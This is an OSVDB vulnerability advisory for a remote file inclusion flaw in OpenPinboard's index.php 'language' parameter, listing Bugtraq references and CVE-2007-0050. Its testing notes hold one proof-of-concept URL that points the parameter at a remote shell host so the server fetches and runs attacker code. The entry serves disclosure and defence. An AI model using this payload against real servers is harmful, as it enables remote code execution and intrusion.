OpenPinboard index.php language Variable Remote File Inclusion

2007-02-22T03:13:26
ID OSVDB:33375
Type osvdb
Reporter OSVDB
Modified 2007-02-22T03:13:26

Description

Manual Testing Notes

http://[target]/[script_path]/index.php?language=http://sh3LL?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0075.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0176.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0234.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0065.html CVE-2007-0050